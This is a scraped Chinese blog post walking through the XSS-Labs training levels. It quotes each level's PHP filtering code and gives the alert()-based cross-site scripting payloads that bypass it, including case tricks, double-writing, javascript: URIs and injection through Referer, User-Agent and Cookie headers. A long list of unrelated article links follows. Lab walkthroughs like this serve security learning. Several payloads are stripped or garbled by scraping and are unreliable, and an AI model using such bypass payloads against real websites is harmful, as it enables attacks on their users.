beglage

XSS-Labs合集

目录

Level 1

Level 2

Level 3

Level 4

Level 5

Level 6

Level 7

Level 8

Level 9

Level 10

Level 11

Level 12

Level 13

Level 16

Level 17

Level 18

测试：

Level 2

闭合双引号和标签

payload

">//

">

Level 3

输入测试 '":()

查看源码发现 < > 被过滤

/script'":()

payload

" οnmοuseοver="alert(/xss/)

Level 5

过滤了on开头的标签，script，使用其他标签绕过

payload

">click me!

Level 6

分析源码

$str2=str_replace("

 
  发现将常用的标签都过滤了，但是他没进行大小写转换，href大写绕过 
   
   payload 
   " Onmouseover="alert(/xss/) 
   ">click me! 
   
    
  Level 7 
  分析源码 
  $str =strtolower( $_GET["keyword"]);

$str2=str_replace("script","",$str);

$str3=str_replace("on","",$str2);

$str4=str_replace("src","",$str3);

$str5=str_replace("data","",$str4);

$str6=str_replace("href","",$str5); 
  这里使用了小写转换，无法使用大写绕过，由于只是将字符删除，可以尝试使用双写绕过 
   
   payload 
   ">click me ! 
   ">alert(1) 
   " oONnmouseover="alert(/xss/) 
   
  Level 8 
  分析源码 
  $str = strtolower($_GET["keyword"]);

$str2=str_replace("script","scr_ipt",$str);

$str3=str_replace("on","o_n",$str2);

$str4=str_replace("src","sr_c",$str3);

$str5=str_replace("data","da_ta",$str4);

$str6=str_replace("href","hr_ef",$str5);

$str7=str_replace('"','"',$str6); 
  这里的过滤更加严格，尝试使用编码绕过 
   
   payload 
   javascRipt:alert(/xss/) 
   
  Level 9 
  和第八关的区别在与加了一条判断 
  if(false===strpos($str7,'http://'))

{

  echo '
友情链接';

 } 
  在alert()里面加上即可 
   
   payload 
   javascRipt:alert('http://xss') 
   
    
  Level 10 
  分析源码 
  $str11 = $_GET["t_sort"];

$str22=str_replace(">","",$str11);

$str33=str_replace("<","",$str22);

 
  这里直接提交t_sort参数即可，由于没有输入框，这里我们自己构造按钮，触发事件 
   
   payload 
   ?t_sort=click me!" type="button" οnclick="alert(/xss/) 
   
  Level 11 
  分析源码 
  $str11=$_SERVER['HTTP_REFERER'];

$str22=str_replace(">","",$str11);

$str33=str_replace("<","",$str22); 
  这里接受的是referer字段的传递的值，在第十关使用bp抓包，修改referer字段即可 
   
   payload 
   Referer: click me!" type="button" οnclick="alert(/xss/) 
   
    
  Level 12 
  分析源码 
  $str11=$_SERVER['HTTP_USER_AGENT'];

$str22=str_replace(">","",$str11);

$str33=str_replace("<","",$str22); 
  和上一关类似，只是变为了USER_AGENT字段 
   
   payload 
   User-Agent: click me!" type="button" οnclick="alert(/xss/) 
   
  Level 13 
  分析源码 
  $str11=$_COOKIE["user"];

$str22=str_replace(">","",$str11);

$str33=str_replace("<","",$str22); 
  和上一关类似，只是变为了cookie的user字段 
   
   payload 
   Cookie: user=click me!" type="button" οnclick="alert(/xss/) 
   
  Level 16 
  分析源码 
  $str = strtolower($_GET["keyword"]);

$str2=str_replace("script"," ",$str);

$str3=str_replace(" "," ",$str2);

$str4=str_replace("/"," ",$str3);

$str5=str_replace("        "," ",$str4); 
  这里过滤了空格，使用%0D编码绕过 
   
   payload 
   ?keyword= 
   
    
  Level 17 
  分析源码 
   
  发现传入的两个参数都传入事件，进行攻击 
   
   payload 
   ?arg01=a&arg02=b οnmοusedοwn=alert(1) 
   ?arg01=a οnmοusedοwn=alert(1)&arg02=b 
   
  Level 18 
  和17关类似 
   
   payload 
   ?arg01=a&arg02=b οnmοusedοwn=alert(1) 
   ?arg01=a οnmοusedοwn=alert(1)&arg02=b 
   
    
  后面的两关涉及到反编译的内容，笔者。。


    
        你可能感兴趣的:(靶机实战,渗透测试)
        
            
                
                    【Death Note】网吧战神之7天爆肝渗透测试死亡笔记_sqlmap在默认情况下除了使用 char() 函数防止出现单引号
                        2401_84561374
程序员笔记
                        网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。需要这份系统化的资料的朋友，可以戳这里获取一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！特殊服务端口2181zookeeper服务未授权访问
                    
                    渗透测试的了解
                        锅盖'awa'
网络安全小白之路安全性测试安全
                        文章目录概述一、渗透测试分类1.黑盒测试／外部测试2.白盒测试／内部测试3.灰盒测试／组合测试二、渗透测试-目标分类1、主机操作系统渗透2、数据库系统渗透3、应用系统渗透4、网络设备渗透三、渗透测试过程（七个阶段）1.前期交互阶段（Pre-EngagementInteraction）2.情报搜集阶段（InformationGathering）3.威胁建模阶段（ThreatModeling）4.漏洞
                    
                    网络安全测评技术与标准
                        坚持可信
信息安全web安全网络安全
                        网络安全测评是评估信息系统、网络和应用程序的安全性，以发现潜在的漏洞和威胁，并确保系统符合安全标准和政策的过程。以下是常见的网络安全测评类型：1.渗透测试（PenetrationTesting）描述：通过模拟真实的攻击，评估系统、网络和应用程序的安全性，识别和修复漏洞。目标：发现系统中的安全漏洞，评估其可能被利用的风险。方法：黑盒测试：测试人员没有系统内部信息，模拟外部攻击者。白盒测试：测试人员拥
                    
                    写出渗透测试信息收集详细流程
                        卿酌南烛_b805

                        一、扫描域名漏洞：域名漏洞扫描工具有AWVS、APPSCAN、Netspark、WebInspect、Nmap、Nessus、天镜、明鉴、WVSS、RSAS等。二、子域名探测：1、dns域传送漏洞2、搜索引擎查找（通过Google、bing、搜索c段）3、通过ssl证书查询网站：https://myssl.com/ssl.html和https://www.chinassl.net/ssltools
                    
                    网络安全（黑客）自学
                        白帽子凯哥
web安全安全网络安全服务器网络
                        一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
                    
                    网络安全（黑客）——自学2024
                        白帽子黑客-宝哥
web安全安全嵌入式硬件网络单片机
                        一、什么是网络安全网络安全是一种综合性的概念，涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、网络安全怎么入门安全并非孤立存在，而是建立在其计算机基础之上的应用技术。
                    
                    2024网络安全学习路线 非常详细 推荐学习
                        白帽黑客-晨哥
web安全学习安全数据库php
                        关键词：网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊，学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间，光语言都有几门，有些人会倒在学习linux系统及命令的路上，更多的人会倒在学习语言上；2、知识点掌握程度不清楚对于网络安全基础内容，很多人不清楚需要学到什么程度，囫囵吞枣，导致在基础上花费太多时间；看到很多小伙伴，买了HTML，PHP，数据库，计算机
                    
                    入门网络安全工程师要学习哪些内容
                        白帽黑客2659
web安全学习安全网安入门网络安全
                        大家都知道网络安全行业很火，这个行业因为国家政策趋势正在大力发展，大有可为!但很多人对网络安全工程师还是不了解，不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称，学习的东西很多，具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师，学的内容侧重点就和渗透测试工程师不一样，如果你想成为安全开发工程师，学的侧重点就和安全运维工程师不一样。网络安全工程师学的东
                    
                    python绝技运用python成为顶级pdf_python绝技：运用python成为顶级黑客 中文pdf完整版[42MB]...
                        weixin_39851261

                        Python是一门常用的编程语言，它不仅上手容易，而且还拥有丰富的支持库。对经常需要针对自己所处的特定场景编写专用工具的黑客、计算机犯罪调查人员、渗透测试师和安全工程师来说，Python的这些特点可以帮助他们又快又好地完成这一任务，以极少的代码量实现所需的功能。Python绝技：运用Python成为顶级黑客结合具体的场景和真实的案例，详述了Python在渗透测试、电子取证、网络流量分析、无线安全、
                    
                    2024网络安全学习路线 非常详细 推荐学习
                        白帽黑客-晨哥
web安全学习安全数据库php
                        关键词：网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊，学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间，光语言都有几门，有些人会倒在学习linux系统及命令的路上，更多的人会倒在学习语言上；2、知识点掌握程度不清楚对于网络安全基础内容，很多人不清楚需要学到什么程度，囫囵吞枣，导致在基础上花费太多时间；看到很多小伙伴，买了HTML，PHP，数据库，计算机
                    
                    入门网络安全工程师要学习哪些内容
                        白帽黑客2659
web安全学习安全网安入门网络安全
                        大家都知道网络安全行业很火，这个行业因为国家政策趋势正在大力发展，大有可为!但很多人对网络安全工程师还是不了解，不知道网络安全工程师需要学什么?知了堂小编总结出以下要点。网络安全工程师是一个概称，学习的东西很多，具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师，学的内容侧重点就和渗透测试工程师不一样，如果你想成为安全开发工程师，学的侧重点就和安全运维工程师不一样。网络安全工程师学的东
                    
                    网络安全工程师自主学习计划表（具体到阶段目标）
                        大模型综述
web安全网络安全系统安全安全学习
                        前言接下来我将给大家分享一份网络安全工程师自学计划指南，全文将从学习路线、学习规划、学习方法三个方向来讲述零基础小白如何通过自学进阶网络安全工程师，全文篇幅有点长，同学们可以先点个收藏，以免日后错过了。目录前言学习路线学习规划初级1、网络安全理论知识（2天）2、渗透测试基础（1周）3、操作系统基础（1周）4、计算机网络基础（1周）5、数据库基础操作（2天）6、Web渗透（1周）中级、高级7、脚本编
                    
                    网络安全（黑客技术）—2024自学手册
                        一个迷人的黑客
web安全安全网络学习网络安全信息安全渗透测试
                        前言什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行，因为不知如何去学，在这里，我将这个整份答案分为黑客（网络安全）入门必备、黑客（网络安全）职业指南、黑客（网络安全）学习导航三大章节，涉及价值观、方法论、执行力、行业分类、职位解读、法
                    
                    自学黑客（网络安全）
                        白袍无涯
web安全网络安全网络安全系统安全运维计算机网络
                        前言：想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟
                    
                    网络安全最新网络安全-SSRF漏洞原理、攻击与防御(1)，2024年最新网络安全程序员架构之路该如何继续学习
                        2401_84265972
程序员网络安全学习面试
                        如何自学黑客&网络安全黑客零基础入门学习路线&规划初级黑客1、网络安全理论知识（2天）①了解行业相关背景，前景，确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。（非常重要）2、渗透测试基础（一周）①渗透测试的流程、分类、标准②信息收集技术：主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理，利用方法、工具（MSF
                    
                    网络安全（黑客）自学
                        白帽子凯哥
web安全安全网络安全服务器网络
                        一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
                    
                    自学黑客（网络安全）
                        L世界凌乱了
web安全安全网络安全网络学习
                        前言：想自学网络安全（黑客技术）首先你得了解什么是网络安全！什么是黑客！网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟
                    
                    安全检查怎么做？只有最小化原则！
                        吉祥同学学安全

                        背景：什么是安全检查，安全检查就是你的监管部门对你的网络进行安全检查，检查是否符合规定（这里只聊技术性的检查），比如通过攻防演习对你的系统进行检查或者通过渗透测试对你的系统进行检查，而在被检查前作为被检查单位往往要做很多工作，防止在被检查过程中检查处很多问题，而这时有个新的名词叫：迎检，也就是迎接检查的意思，前些年迎检在运营商行业特别的常见，近些年随着国家对网络安全的重视，比如电力、金融、基础设施
                    
                    渗透测试从入门到入狱（一）
                        yangc随想

                        信息收集nslookupnslookupsina.com-type=any8.8.8.8nslookup>域名>settype/q=a/mx/ns/any>域名查询域名主机服务器[email protected]+noall+answermail.163.comany//只看恢复信息dig-x220.181.14.157#反向查询（ptr）d
                    
                    Web安全和渗透测试有什么关系？
                        程序员_大白
web安全安全
                        做渗透测试的一个环节就是测试web安全，需要明白漏洞产生原理，通过信息收集互联网暴露面，进行漏洞扫描，漏洞利用，必要时进行脚本自编写和手工测试，力求挖出目标存在的漏洞并提出整改建议，当然如果技术再精一些，还要学习内网渗透（工作组和域环境），白盒审计，app，小程序渗透那些了......总之，web安全包含于渗透测试，但不是渗透测试的全部。`黑客&网络安全如何学习今天只要你给我的文章点赞，我私藏的网
                    
                    网络安全（黑客）自学
                        白帽子凯哥
web安全安全网络安全服务器网络
                        一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的“红队”、“渗透测试”等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防两面性，例如Web安全技术，既有Web渗透，也有Web防御技术（WAF）。作为一个合格的网络安全工程师，应该做到攻守兼备，毕竟知己知彼，才能百战百胜。二、怎样规划网络安全如果你是一
                    
                    零基础能学网络安全吗？
                        leah126
程序员渗透测试编程web安全安全网络
                        当然可以。但网络安全有很多方向，如果你想转行网络安全技术方向，建议先着手学web安全方向。因为，web安全相对于整个网络安全行业来说难度是相对比较低的，学起来更加容易入手。虽然渗透测试工程师、溯源取证、红蓝攻防等等这些岗位看起来很不错，但是技术门槛特别高，对于0基础的人来说学起来会相当吃力。所以，web安全方向对于初学者来说是最好入门选择。那么该如何学习呢？1.买一本《白帽子讲web安全》，先了解
                    
                    零基础转行学网络安全怎么样？能找到什么样的工作？
                        爱吃小石榴16
web安全安全人工智能运维学习
                        网络安全对于现代社会来说变得越来越重要，但是很多人对于网络安全的知识却知之甚少。那么，零基础小白可以学网络安全吗？答案是肯定的。零基础转行学习网络安全是完全可行的，但需要明确的是，网络安全是一个既广泛又深入的领域，包含了网络协议、系统安全、应用安全、密码学、渗透测试、漏洞挖掘、安全编程、安全运维等多个方面。。网络安全是一个快速发展的领域，对专业人才的需求不断增长。以下是一些关于零基础转行学习网络安
                    
                    【网络安全面经】渗透面经、安服面经、红队面经、hw面经应有尽有 这一篇真的够了
                        webfker from 0 to 1
githubgitjava
                        目录面经牛客奇安信面经（五星推荐）牛客面经（推荐）渗透测试面经（推荐）渗透测试技巧计网面经SQL注入漏洞注入绕过XXE漏洞最强面经Github面经模拟面WEB安全PHP安全网络安全密码学一、青藤二、360三、漏洞盒子四、未知厂商五、长亭-红队六、qax七、天融信八、安恒九、长亭十、国誉网安十一、360-红队十二、天融信十三、长亭-2十四、360-2十五、极盾科技十六、阿里十七、长亭3十八、qax-
                    
                    Metasploit技术博客：全面指南
                        Hello.Reader
渗透测试安全测试安全性测试安全架构web安全安全安全威胁分析
                        一、概述Metasploit是一款功能强大的渗透测试框架，在网络安全领域中扮演着关键角色。无论你是初学者还是经验丰富的渗透测试专家，Metasploit都提供了一整套工具，用于发现、利用和验证系统中的安全漏洞。本文将详细探讨Metasploit的基础知识、常用模块、实战案例、高级功能、最佳实践以及未来发展趋势，为您提供全面的技术指南。二、什么是Metasploit？Metasploit由Rapid
                    
                    深入了解 Nmap：网络安全扫描工具的强大功能与实战应用
                        Hello.Reader
安全测试渗透测试web安全安全
                        1.什么是Nmap？Nmap（NetworkMapper）是一款开源的网络扫描工具，被广泛用于网络发现、管理和安全审计。自1997年由GordonLyon（Fyodor）发布以来，Nmap一直是网络管理员、安全专家、渗透测试人员的重要工具。Nmap支持多种操作系统，包括Windows、Linux、MacOS和其他类Unix系统。Nmap的功能不仅限于端口扫描，还可以执行操作系统检测、服务版本检测、
                    
                    2024网络安全学习路线 非常详细 推荐学习
                        白帽黑客-晨哥
web安全学习安全数据库php
                        关键词：网络安全入门、渗透测试学习、零基础学安全、网络安全学习路线首先咱们聊聊，学习网络安全方向通常会有哪些问题1、打基础时间太长学基础花费很长时间，光语言都有几门，有些人会倒在学习linux系统及命令的路上，更多的人会倒在学习语言上；2、知识点掌握程度不清楚对于网络安全基础内容，很多人不清楚需要学到什么程度，囫囵吞枣，导致在基础上花费太多时间；看到很多小伙伴，买了HTML，PHP，数据库，计算机
                    
                    网络安全售前入门05安全服务——渗透测试服务方案
                        努力工作的网安人
网络安全web安全安全经验分享网络安全
                        目录1.服务概述2.测试内容2.1网络层安全2.2系统层安全2.3应用层安全3.测试范围4.漏洞分级5.渗透用例6.测试风险6.1风险说明6.2风险规避6.3数据备份7.服务输出1.服务概述渗透性测试是对安全情况最客观、最直接的评估方式，主要是模拟黑客的攻击方法对系统和网络进行非破坏性质的攻击性测试，目的是侵入系统，获取系统控制权并将入侵的过程和细节产生报告给用户，由此证实用户系统所存在的安全威胁
                    
                    小白如何快速入门网络安全里，主要岗位有哪些？
                        baimao__沧海
web安全安全linuxtcpdump运维java
                        入门Web安全、安卓安全、二进制安全、工控安全还是智能硬件安全等等，每个不同的领域要掌握的技能也不同。当然入门Web安全相对难度较低，也是很多人的首选。主要还是看自己的兴趣方向吧。本文就以下几个问题来说明网络安全大致学习过程网络安全主要岗位有哪些安全领域技术方向分类渗透测试学习路线小白如何快速入门一、网络安全里的主要的岗位有哪些：渗透测试工程师：主要是模拟黑客对目标业务系统进行攻击，点到为止安全运
                    
                    【渗透测试】利用hook技术破解前端JS加解密 - JS-Forward
                        Hello_Brian
渗透测试安全Hook技术前端JS加解密渗透测试web安全
                        前言在做渗透测试项目时，尤其是金融方面，经常会遇到前端JS加解密技术，看着一堆堆密密麻麻的密文，会给人一种无力感。Hook技术则会帮助我们无需获取加解密密钥的前提下，获取明文进行渗透测试环境准备JS-ForwardBurpsuiteFiddler网上公开的加解密逻辑漏洞的靶场源码某大佬搭建的公网测试环境（请礼貌使用）：http://39.98.108.20:8085/Hook-JS技术详解正常访问
                    
                                html页面js获取参数值
                                    0624chenhong
html
                                    1.js获取参数值js 
function GetQueryString(name) 
 { 
      var reg = new RegExp("(^|&)"+ name +"=([^&]*)(&|$)"); 
      var r = windo
                                
                                MongoDB 在多线程高并发下的问题
                                    BigCat2013
mongodbDB高并发重复数据
                                    最近项目用到 MongoDB , 主要是一些读取数据及改状态位的操作. 因为是结合了最近流行的 Storm进行大数据的分析处理，并将分析结果插入Vertica数据库，所以在多线程高并发的情境下, 会发现 Vertica 数据库中有部分重复的数据. 这到底是什么原因导致的呢？笔者开始也是一筹莫 展，重复去看 MongoDB 的 API , 终于有了新发现 ： 
com.mongodb.DB 这个类有
                                
                                c++ 用类模版实现链表(c++语言程序设计第四版示例代码)
                                    CrazyMizzz
数据结构C++
                                    #include<iostream>
#include<cassert>
using namespace std;
template<class T>
class Node
{
private:
	Node<T> * next;
public:
	T data;                                    
                                
                                最近情况
                                    麦田的设计者
感慨考试生活
                                       在五月黄梅天的岁月里，一年两次的软考又要开始了。到目前为止，我已经考了多达三次的软考，最后的结果就是通过了初级考试（程序员）。人啊，就是不满足，考了初级就希望考中级，于是，这学期我就报考了中级，明天就要考试。感觉机会不大，期待奇迹发生吧。这个学期忙于练车，写项目，反正最后是一团糟。后天还要考试科目二。这个星期真的是很艰难的一周，希望能快点度过。 
  
                                
                                linux系统中用pkill踢出在线登录用户
                                    被触发
linux
                                    由于linux服务器允许多用户登录，公司很多人知道密码，工作造成一定的障碍所以需要有时踢出指定的用户 
1/#who   查出当前有那些终端登录（用 w 命令更详细） 
# who 
root     pts/0        2010-10-28 09:36 (192
                                
                                仿QQ聊天第二版
                                    肆无忌惮_
qq
                                    在第一版之上的改进内容: 
 第一版链接: 
http://479001499.iteye.com/admin/blogs/2100893 
  
用map存起来号码对应的聊天窗口对象,解决私聊的时候所有消息发到一个窗口的问题. 
增加ViewInfo类,这个是信息预览的窗口,如果是自己的信息,则可以进行编辑. 
  
信息修改后上传至服务器再告诉所有用户,自己的窗口
                                
                                java读取配置文件
                                    知了ing

                                    1，java读取.properties配置文件 
 
InputStream in;
		try {
			in = test.class.getClassLoader().getResourceAsStream("config/ipnetOracle.properties");//配置文件的路径
		    Properties p = new Properties()
                                
                                __attribute__ 你知多少？
                                    矮蛋蛋
C++gcc
                                    原文地址: 
http://www.cnblogs.com/astwish/p/3460618.html 
GNU C 的一大特色就是__attribute__ 机制。__attribute__ 可以设置函数属性（Function Attribute ）、变量属性（Variable Attribute ）和类型属性（Type Attribute ）。 
 
__attribute__ 书写特征是：
                                
                                jsoup使用笔记
                                    alleni123
java爬虫JSoup
                                    <dependency>
	<groupId>org.jsoup</groupId>
	<artifactId>jsoup</artifactId>
	<version>1.7.3</version>
</dependency>
 
 
 
 
 
2014/08/28 
今天遇到这种形式， 
                                
                                JAVA中的集合 Collectio 和Map的简单使用及方法
                                    百合不是茶
listmapset
                                             List ,set ,map的使用方法和区别 
java容器类类库的用途是保存对象，并将其分为两个概念： 
    Collection集合：一个独立的序列，这些序列都服从一条或多条规则;List必须按顺序保存元素  ，set不能重复元素；Queue按照排队规则来确定对象产生的顺序（通常与他们被插入的
                                
                                杀LINUX的JOB进程
                                    bijian1013
linuxunix
                                    今天发现数据库一个JOB一直在执行，都执行了好几个小时还在执行，所以想办法给删除掉 
  
系统环境： 
   ORACLE 10G 
   Linux操作系统 
  
操作步骤如下： 
第一步.查询出来那个job在运行，找个对应的SID字段 
select * from dba_jobs_running--找到job对应的sid 
&n
                                
                                Spring AOP详解
                                    bijian1013
javaspringAOP
                                            最近项目中遇到了以下几点需求，仔细思考之后，觉得采用AOP来解决。一方面是为了以更加灵活的方式来解决问题，另一方面是借此机会深入学习Spring AOP相关的内容。例如，以下需求不用AOP肯定也能解决，至于是否牵强附会，仁者见仁智者见智。 
1.对部分函数的调用进行日志记录，用于观察特定问题在运行过程中的函数调用
                                
                                [Gson六]Gson类型适配器(TypeAdapter)
                                    bit1129
Adapter
                                    TypeAdapter的使用动机 
 Gson在序列化和反序列化时，默认情况下，是按照POJO类的字段属性名和JSON串键进行一一映射匹配，然后把JSON串的键对应的值转换成POJO相同字段对应的值，反之亦然，在这个过程中有一个JSON串Key对应的Value和对象之间如何转换(序列化/反序列化)的问题。 
  
以Date为例，在序列化和反序列化时，Gson默认使用java.
                                
                                【spark八十七】给定Driver Program， 如何判断哪些代码在Driver运行，哪些代码在Worker上执行
                                    bit1129
driver
                                    Driver Program是用户编写的提交给Spark集群执行的application，它包含两部分 
 
 作为驱动： Driver与Master、Worker协作完成application进程的启动、DAG划分、计算任务封装、计算任务分发到各个计算节点(Worker)、计算资源的分配等。 
 计算逻辑本身，当计算任务在Worker执行时，执行计算逻辑完成application的计算任务 
 
                                
                                nginx 经验总结
                                    ronin47
nginx 总结
                                    　　　深感nginx的强大，只学了皮毛，把学下的记录。 
　　　获取Header 信息，一般是以$http_XX（ＸＸ是小写） 
           获取body,通过接口，再展开，根据Ｋ取Ｖ 
　　　获取uri,以$arg_XX 
     &n
                                
                                轩辕互动-1.求三个整数中第二大的数2.整型数组的平衡点
                                    bylijinnan
数组
                                    
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;


public class ExoWeb {

	public static void main(String[] args) {
		ExoWeb ew=new ExoWeb();
		
		System.out.pri
                                
                                Netty源码学习-Java-NIO-Reactor
                                    bylijinnan
java多线程netty
                                    Netty里面采用了NIO-based Reactor Pattern 
了解这个模式对学习Netty非常有帮助 
 
参考以下两篇文章： 
 
http://jeewanthad.blogspot.com/2013/02/reactor-pattern-explained-part-1.html 
 
http://gee.cs.oswego.edu/dl/cpjslides/nio.pdf 

                                
                                AOP通俗理解
                                    cngolon
springAOP
                                    1.我所知道的aop     初看aop,上来就是一大堆术语，而且还有个拉风的名字，面向切面编程，都说是OOP的一种有益补充等等。一下子让你不知所措，心想着：怪不得很多人都和 我说aop多难多难。当我看进去以后，我才发现：它就是一些java基础上的朴实无华的应用，包括ioc，包括许许多多这样的名词，都是万变不离其宗而 已。 2.为什么用aop&nb
                                
                                cursor variable 实例
                                    ctrain
variable
                                    
create or replace procedure proc_test01
as 
type emp_row is record(
empno emp.empno%type,
ename emp.ename%type,
job emp.job%type,
mgr emp.mgr%type,
hiberdate emp.hiredate%type,
sal emp.sal%t
                                
                                shell报bash: service: command not found解决方法
                                    daizj
linuxshellservicejps
                                    今天在执行一个脚本时，本来是想在脚本中启动hdfs和hive等程序，可以在执行到service hive-server start等启动服务的命令时会报错，最终解决方法记录一下： 
  
脚本报错如下： 
./olap_quick_intall.sh: line 57: service: command not found 
./olap_quick_intall.sh: line 59
                                
                                40个迹象表明你还是PHP菜鸟
                                    dcj3sjt126com
设计模式PHP正则表达式oop
                                    你是PHP菜鸟，如果你：1. 不会利用如phpDoc 这样的工具来恰当地注释你的代码2. 对优秀的集成开发环境如Zend Studio 或Eclipse PDT 视而不见3. 从未用过任何形式的版本控制系统，如Subclipse4. 不采用某种编码与命名标准 ，以及通用约定，不能在项目开发周期里贯彻落实5. 不使用统一开发方式6. 不转换（或）也不验证某些输入或SQL查询串（译注：参考PHP相关函
                                
                                Android逐帧动画的实现
                                    dcj3sjt126com
android
                                    一、代码实现： 
private ImageView iv;
	private AnimationDrawable ad;
	
	@Override
	protected void onCreate(Bundle savedInstanceState)
	{
		super.onCreate(savedInstanceState);
		setContentView(R.layout
                                
                                java远程调用linux的命令或者脚本
                                    eksliang
linuxganymed-ssh2
                                    转载请出自出处：
http://eksliang.iteye.com/blog/2105862  
    
   Java通过SSH2协议执行远程Shell脚本(ganymed-ssh2-build210.jar)  
 使用步骤如下： 
1.导包 
官网下载: 
http://www.ganymed.ethz.ch/ssh2/ 
ma
                                
                                adb端口被占用问题
                                    gqdy365
adb
                                    最近重新安装的电脑，配置了新环境，老是出现： 
 
 

 adb server is out of date.  killing...  
    ADB server didn't ACK  
    * failed to start daemon *  
 
百度了一下，说是端口被占用，我开个eclipse，然后打开cmd，就提示这个，很烦人。 
 
一个比较彻底的解决办法就是修改
                                
                                ASP.NET使用FileUpload上传文件
                                    hvt
.netC#hovertreeasp.netwebform
                                    前台代码： 
<asp:FileUpload ID="fuKeleyi" runat="server" />
<asp:Button ID="BtnUp" runat="server" onclick="BtnUp_Click" Text="上 传" />
                                
                                代码之谜（四）- 浮点数（从惊讶到思考）
                                    justjavac
浮点数精度代码之谜IEEE
                                    在『代码之谜』系列的前几篇文章中，很多次出现了浮点数。 浮点数在很多编程语言中被称为简单数据类型，其实，浮点数比起那些复杂数据类型（比如字符串）来说， 一点都不简单。 
单单是说明 IEEE浮点数 就可以写一本书了，我将用几篇博文来简单的说说我所理解的浮点数，算是抛砖引玉吧。 一次面试 
记得多年前我招聘 Java 程序员时的一次关于浮点数、二分法、编码的面试， 多年以后，他已经称为了一名很出色的
                                
                                数据结构随记_1
                                    lx.asymmetric
数据结构笔记
                                    第一章 
  1.数据结构包括数据的
逻辑结构、数据的物理/存储结构和数据的逻辑关系这三个方面的内容。 2.数据的存储结构可用四种基本的存储方法表示，它们分别是
顺序存储、链式存储 、索引存储 和 散列存储。 3.数据运算最常用的有五种，分别是
 查找/检索、排序、插入、删除、修改。 4.算法主要有以下五个特性： 
输入、输出、可行性、确定性和有穷性。 5.算法分析的
                                
                                linux的会话和进程组
                                    网络接口
linux
                                    会话： 一个或多个进程组。起于用户登录，终止于用户退出。此期间所有进程都属于这个会话期。会话首进程：调用setsid创建会话的进程1.规定组长进程不能调用setsid，因为调用setsid后，调用进程会成为新的进程组的组长进程.如何保证？ 先调用fork，然后终止父进程，此时由于子进程的进程组ID为父进程的进程组ID，而子进程的ID是重新分配的，所以保证子进程不会是进程组长，从而子进程可以调用se
                                
                                二维数组 元素的连续求解
                                    1140566087
二维数组ACM
                                    import java.util.HashMap;




public class Title {
	public static void main(String[] args){
		f();
	}

	// 二位数组的应用
	//12、二维数组中，哪一行或哪一列的连续存放的0的个数最多，是几个0。注意，是“连续”。
	public static void f(){

                                
                                也谈什么时候Java比C++快
                                    windshome
javaC++
                                      
刚打开iteye就看到这个标题“Java什么时候比C++快”，觉得很好笑。 
  
你要比，就比同等水平的基础上的相比，笨蛋写得C代码和C++代码，去和高手写的Java代码比效率，有什么意义呢？ 
  
我是写密码算法的，深刻知道算法C和C++实现和Java实现之间的效率差，甚至也比对过C代码和汇编代码的效率差，计算机是个死的东西，再怎么优化，Java也就是和C
                                
                
            
        
    


    
        
            按字母分类：
            ABCDEFGHIJKLMNOPQRSTUVWXYZ其他
        
    


    
        
            首页 -
            关于我们 -
            站内搜索 -
            Sitemap -
            侵权投诉
        
        版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.